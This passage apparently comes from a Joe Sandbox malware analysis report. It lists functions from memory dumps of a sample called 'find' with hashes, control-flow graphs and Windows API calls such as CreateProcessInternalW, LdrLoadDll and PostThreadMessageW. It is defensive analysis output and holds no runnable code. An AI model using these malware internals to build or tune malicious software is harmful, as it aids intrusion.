                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 0d060c5a65e4c94700d4a1d909ba23bcf9c9ca620a1f070e905e229587f40ee8
                                                                                                                                        • Instruction ID: ebbe774ed32f1ac7a5cf2a06c3f79dc4ebf6be2eafee275c26be85bad45e112b
                                                                                                                                        • Opcode Fuzzy Hash: 0d060c5a65e4c94700d4a1d909ba23bcf9c9ca620a1f070e905e229587f40ee8
                                                                                                                                        • Instruction Fuzzy Hash: 1490023120588C83D110B158850474A000587D4301F59D411A442669CD87D589917121
                                                                                                                                        Function 030F2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: c4172312df773edbe89d65537564cb88ce7b54a4a4cdaad80e7abc580f374c17
                                                                                                                                        • Instruction ID: 97fd859f5af4bf731baaacb45f2b365f2d6e1887adfa3ccfe5159c7255ea1a17
                                                                                                                                        • Opcode Fuzzy Hash: c4172312df773edbe89d65537564cb88ce7b54a4a4cdaad80e7abc580f374c17
                                                                                                                                        • Instruction Fuzzy Hash: 9D90023120580C83D100B5985508646000587E4301F55E011A5026599EC7A589916131
                                                                                                                                        Function 030F35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 5dd91f25f29cdb1ab00deaae1ac605956ca217777c14eb17ff36130d4ed2a0c1
                                                                                                                                        • Instruction ID: 507a8d1d3055c03fcde5df85c71bbc2036dd66529e806229638b30de936a6340
                                                                                                                                        • Opcode Fuzzy Hash: 5dd91f25f29cdb1ab00deaae1ac605956ca217777c14eb17ff36130d4ed2a0c1
                                                                                                                                        • Instruction Fuzzy Hash: C090023160990C83D100B1584614706100587D4201F65D411A04265ACD87D58A5165A2
                                                                                                                                        Function 030F39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 30def62f92b72e44a8b8471dfe12f50f5ef06a2e73655867da43950c201e049c
                                                                                                                                        • Instruction ID: e20b6074e10cd16580f51e4b6de7ce3c1e47938273190fc99073def6986349dd
                                                                                                                                        • Opcode Fuzzy Hash: 30def62f92b72e44a8b8471dfe12f50f5ef06a2e73655867da43950c201e049c
                                                                                                                                        • Instruction Fuzzy Hash: 3990023124985983D150B15C45046164005A7E4201F55D021A08165D8D879589556221
                                                                                                                                        Function 008B0EF7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92threadwindowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 425 8b0ef7-8b0f09 426 8b0f4b-8b0f54 425->426 427 8b0f0b-8b0f1d 425->427 428 8b0f1f-8b0f26 427->428 429 8b0f76-8b0f7f 427->429 432 8b0f27-8b0f43 428->432 430 8b0f85-8b0fca call 8b4730 call 8a13e0 call 8c1e60 429->430 431 8b0f80 call 8cc1a0 429->431 440 8b0fea-8b0ff0 430->440 441 8b0fcc-8b0fdb PostThreadMessageW 430->441 431->430 432->426 441->440 442 8b0fdd-8b0fe7 441->442 442->440
                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 008B0FD7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: e151968$e151968
                                                                                                                                        • API String ID: 1836367815-1714165782
                                                                                                                                        • Opcode ID: dff3c99ebe8f82e78cd61e7552ec5033fbfb9b47d96495e17cfd6294eb1bd34a
                                                                                                                                        • Instruction ID: 205db763fdf1241efb9b96727665dc9a5023b0af609eb5bfbf4e3b16221f0993
                                                                                                                                        • Opcode Fuzzy Hash: dff3c99ebe8f82e78cd61e7552ec5033fbfb9b47d96495e17cfd6294eb1bd34a
                                                                                                                                        • Instruction Fuzzy Hash: 8921AC7260925D7A9B1156A81C818FEBB6CEB02370B0482AAE894DB383D6254D038792
                                                                                                                                        Function 008B0F5D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 443 8b0f5d-8b0fca call 8cb790 call 8cc1a0 call 8b4730 call 8a13e0 call 8c1e60 456 8b0fea-8b0ff0 443->456 457 8b0fcc-8b0fdb PostThreadMessageW 443->457 457->456 458 8b0fdd-8b0fe7 457->458 458->456
                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 008B0FD7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: e151968$e151968
                                                                                                                                        • API String ID: 1836367815-1714165782
                                                                                                                                        • Opcode ID: 1f2d35f3733551a780787f5eda6c898a51f723e0808061f033a263329ac30ce1
                                                                                                                                        • Instruction ID: c98f0ca1c380887fb8e4b6992f6d2a822a896734b264c5ed25984c306f0bdae5
                                                                                                                                        • Opcode Fuzzy Hash: 1f2d35f3733551a780787f5eda6c898a51f723e0808061f033a263329ac30ce1
                                                                                                                                        • Instruction Fuzzy Hash: 55018872D4021C7EEB11AAE54C82DEF7B7CEF45794F048065F914E7241E6349E068BA2
                                                                                                                                        Function 008B0F60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 459 8b0f60-8b0fca call 8cb790 call 8cc1a0 call 8b4730 call 8a13e0 call 8c1e60 471 8b0fea-8b0ff0 459->471 472 8b0fcc-8b0fdb PostThreadMessageW 459->472 472->471 473 8b0fdd-8b0fe7 472->473 473->471
                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 008B0FD7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: e151968$e151968
                                                                                                                                        • API String ID: 1836367815-1714165782
                                                                                                                                        • Opcode ID: bb05a244c4477c3993dd5ddde349af8bd930d90ac3fdf40f86e1ebf393e129e9
                                                                                                                                        • Instruction ID: 1fff20832f3ca5abf2b280df8f469b0695f06455656477e2feec9584f37a120c
                                                                                                                                        • Opcode Fuzzy Hash: bb05a244c4477c3993dd5ddde349af8bd930d90ac3fdf40f86e1ebf393e129e9
                                                                                                                                        • Instruction Fuzzy Hash: 94018872D4021C7ADB11AAE54C82DEF7B7CEF41794F048055F914E7241D6349E068BA2
                                                                                                                                        Function 008B0EE4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56threadwindowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 474 8b0ee4-8b0fca call 8cb790 call 8cc1a0 call 8b4730 call 8a13e0 call 8c1e60 486 8b0fea-8b0ff0 474->486 487 8b0fcc-8b0fdb PostThreadMessageW 474->487 487->486 488 8b0fdd-8b0fe7 487->488 488->486
                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 008B0FD7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: e151968$e151968
                                                                                                                                        • API String ID: 1836367815-1714165782
                                                                                                                                        • Opcode ID: 64a15e6c45a799872822cf0dcf7ac46a933c628447448f938c7dc3c06b919add
                                                                                                                                        • Instruction ID: 8d653fc3595dca5fe41cf47b391d6e7ac74705a7a3463ff18b5918d919a64fb7
                                                                                                                                        • Opcode Fuzzy Hash: 64a15e6c45a799872822cf0dcf7ac46a933c628447448f938c7dc3c06b919add
                                                                                                                                        • Instruction Fuzzy Hash: 3E01D672D4425CBADF119AE84C82DEF7B7CFF41754F048198F914E7341DA3899068BA2
                                                                                                                                        Function 008C3CA0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 008C3D7B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep
                                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                                        • Opcode ID: 1fdc08a6907c13953fe09c2ee08094e52864dfca08c083a11694c04097a914f1
                                                                                                                                        • Instruction ID: ad48d08aa1649ce76de7f358b649cf3e46938fbfd71f4b02a405850004acc26d
                                                                                                                                        • Opcode Fuzzy Hash: 1fdc08a6907c13953fe09c2ee08094e52864dfca08c083a11694c04097a914f1
                                                                                                                                        • Instruction Fuzzy Hash: FC318EB5600605BBD714DFA4CC81FEBB7B9FB84700F14851DFA1AAB285D770AA40CBA5
                                                                                                                                        Function 008BF710 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeUninitialize
                                                                                                                                        • String ID: @J7<
                                                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                                                        • Opcode ID: 2389d1cd77c0c1f4d6cae6eaed10ff97e13f77748e01afd8717cac1612fb8e54
                                                                                                                                        • Instruction ID: 53600b2ebd1fe909463cd809d3543d95fe07af0b7546c6789c9dcf6263c00746
                                                                                                                                        • Opcode Fuzzy Hash: 2389d1cd77c0c1f4d6cae6eaed10ff97e13f77748e01afd8717cac1612fb8e54
                                                                                                                                        • Instruction Fuzzy Hash: EC311EB5A0060AAFDB00DFD8CC809EEB7B9FF88304B108569E515EB315D775EE058BA0
                                                                                                                                        Function 008B4730 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 008B47A2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2234796835-0
                                                                                                                                        • Opcode ID: 3450b841a561fce2ec7eb3af1f5bde3703eef7511fec9e05869c83b7c4bbb847
                                                                                                                                        • Instruction ID: 98a2d6f017cde8c61d2602649bf181fc05f4b307850bf46ab3e4d7d735ab01d6
                                                                                                                                        • Opcode Fuzzy Hash: 3450b841a561fce2ec7eb3af1f5bde3703eef7511fec9e05869c83b7c4bbb847
                                                                                                                                        • Instruction Fuzzy Hash: 6F010CB5D4020DABDB10DAE4DC42FDEB778EB54308F1041A9E918D7242FA71EA15CB92
                                                                                                                                        Function 008C9A30 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,008B84FE,00000010,?,?,?,00000044,?,00000010,008B84FE,?,?,?), ref: 008C9A90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2186235152-0
                                                                                                                                        • Opcode ID: 6026bf6cc864f872e0decd95382298bf67d59534e48f70a3e9034452c955bd55
                                                                                                                                        • Instruction ID: bf783fb60a0ce0227bee531ec4f78b6927eb24df7b35fb7f51cc3a803edc5264
                                                                                                                                        • Opcode Fuzzy Hash: 6026bf6cc864f872e0decd95382298bf67d59534e48f70a3e9034452c955bd55
                                                                                                                                        • Instruction Fuzzy Hash: 6901C0B2210208BBCB04DF9DDC81EDB77ADEF8C754F008208BA09E3241D630F8518BA4
                                                                                                                                        Function 008A9E10 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 008A9E55
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                        • Opcode ID: accd3b204333f33eee4da8a0e696a1bdfaf0e614be526c0b1e6c3ee62bad8b78
                                                                                                                                        • Instruction ID: ecb48a3424f3a38252d7ebb4f68d980b3fc59c220d4cd6575a70991027accfce
                                                                                                                                        • Opcode Fuzzy Hash: accd3b204333f33eee4da8a0e696a1bdfaf0e614be526c0b1e6c3ee62bad8b78
                                                                                                                                        • Instruction Fuzzy Hash: DDF0657334061436E62065ED9C42FD7769CEB81B61F150016FB0CDA1C1D9A5F90183E9
                                                                                                                                        Function 008A9E0A Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 008A9E55
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                        • Opcode ID: e4081919a80f7c86484bf291a71307900d49d1187bf772709e055ec0d8989206
                                                                                                                                        • Instruction ID: bb088833af0f221f8f4445191550c84d707e8eb92632dfba6015a576be59938a
                                                                                                                                        • Opcode Fuzzy Hash: e4081919a80f7c86484bf291a71307900d49d1187bf772709e055ec0d8989206
                                                                                                                                        • Instruction Fuzzy Hash: CFF0ECB328071036E63065E89C46FD76698DB91750F150119F64DDA1C1C5A1F50187E9
                                                                                                                                        Function 008C99A0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,558D0001,00000007,00000000,00000004,00000000,008B3F93,000000F4), ref: 008C99DC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                        • Opcode ID: 7acc9a6ebdbca071d54bd213222d546e1c3df986107a84034640cb851cd2662b
                                                                                                                                        • Instruction ID: 618014c500d6365f2f8012d22280cd779f2a431632f417646847561eee5498d9
                                                                                                                                        • Opcode Fuzzy Hash: 7acc9a6ebdbca071d54bd213222d546e1c3df986107a84034640cb851cd2662b
                                                                                                                                        • Instruction Fuzzy Hash: A2E092752002057BD614EE5CDC45F9B77ACEFC9710F008018F908E7242D630BD1087B5
                                                                                                                                        Function 008C9960 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(008B1BF9,?,008C6183,008B1BF9,008C589F,008C6183,?,008B1BF9,008C589F,00001000,?,?,00000000), ref: 008C9999
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                        • Opcode ID: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                                                                        • Instruction ID: dc09c2b0d5d4b1eb584b48307eb59922abd6e88760f7dbde98ba548449f1e4c4
                                                                                                                                        • Opcode Fuzzy Hash: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                                                                        • Instruction Fuzzy Hash: 5FE06576200208BBDA14EE58DC42FAB37ACEFC9754F008018F908E7242C670BC108ABA
                                                                                                                                        Function 008B8540 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 008B856C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 2018039860a9adb35563105fde544d1fbe1ea6a95555c4e7d685595568e2857d
                                                                                                                                        • Instruction ID: 4eae6756c9be7f298afff75529aa189cfb6a28ee10bbdc70bb186ae075966434
                                                                                                                                        • Opcode Fuzzy Hash: 2018039860a9adb35563105fde544d1fbe1ea6a95555c4e7d685595568e2857d
                                                                                                                                        • Instruction Fuzzy Hash: 3AE0DF7560030867EA306AAC9C46FA2335CFB48B64F188660B85DCB2D2E938F941C291
                                                                                                                                        Function 008B82CD Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,008B1F00,008C81DF,008C589F,008B1EC6), ref: 008B8363
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        • Opcode ID: f0cc406917c0cbb273357772776b46c32e5c538d7d09d287f40eaa79920eb81d
                                                                                                                                        • Instruction ID: 6983f959a3387771cd18b1f848a45cd2cd2db5ed767ee625beb2a2b85e5323af
                                                                                                                                        • Opcode Fuzzy Hash: f0cc406917c0cbb273357772776b46c32e5c538d7d09d287f40eaa79920eb81d
                                                                                                                                        • Instruction Fuzzy Hash: 46E08CB26402047BEA00AAB49C47FA522C8E744B94F184074BD0CD6382FC64E50182A1
                                                                                                                                        Function 008B8330 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,008B1F00,008C81DF,008C589F,008B1EC6), ref: 008B8363
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        • Opcode ID: 286ba91103c92feaf7c336ad5aabada764f6f5e8fd78604007f9a057e5668fcb
                                                                                                                                        • Instruction ID: c1435f7d4bd87d9a3a8f26bfc5040880df80d63b605648391e61f9133543fbfb
                                                                                                                                        • Opcode Fuzzy Hash: 286ba91103c92feaf7c336ad5aabada764f6f5e8fd78604007f9a057e5668fcb
                                                                                                                                        • Instruction Fuzzy Hash: 49D05E716443087BFA00A6E8CC4BF5632CCBB44B95F144074BA4CD63C2FD64F50086A6
                                                                                                                                        Function 030F2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 0e01b22f69a105dd69232e72531d8f1c59a9e14ac90008f20d766f67a683f015
                                                                                                                                        • Instruction ID: 78e035d8caccd0c8f413caa480fd89b3dc111e9f62022f118db0be132f2d60e0
                                                                                                                                        • Opcode Fuzzy Hash: 0e01b22f69a105dd69232e72531d8f1c59a9e14ac90008f20d766f67a683f015
                                                                                                                                        • Instruction Fuzzy Hash: C9B09B719069C9CADA51E76047087177944A7D0701F19C461D30316C5F4779C1D1E1B5

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 02FA04D8 Relevance: .1, Instructions: 146COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127540782.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_2fa0000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 516cf0092a273cd676debb2814757595a844c6a2a0e1e148994c73f51f6bee84
                                                                                                                                        • Instruction ID: 3aeb88098ac5cb29db1ecb8b1c68c1720706bbfbbf375a5a03e5d01dd7128be9
                                                                                                                                        • Opcode Fuzzy Hash: 516cf0092a273cd676debb2814757595a844c6a2a0e1e148994c73f51f6bee84
                                                                                                                                        • Instruction Fuzzy Hash: 3041D5B1A18B0D4FD368EF69A491776B3E2FB49340F50053DDA8AC3352EB74E8468785
                                                                                                                                        Function 02FADFAA Relevance: 56.5, Strings: 45, Instructions: 214COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127540782.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_2fa0000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
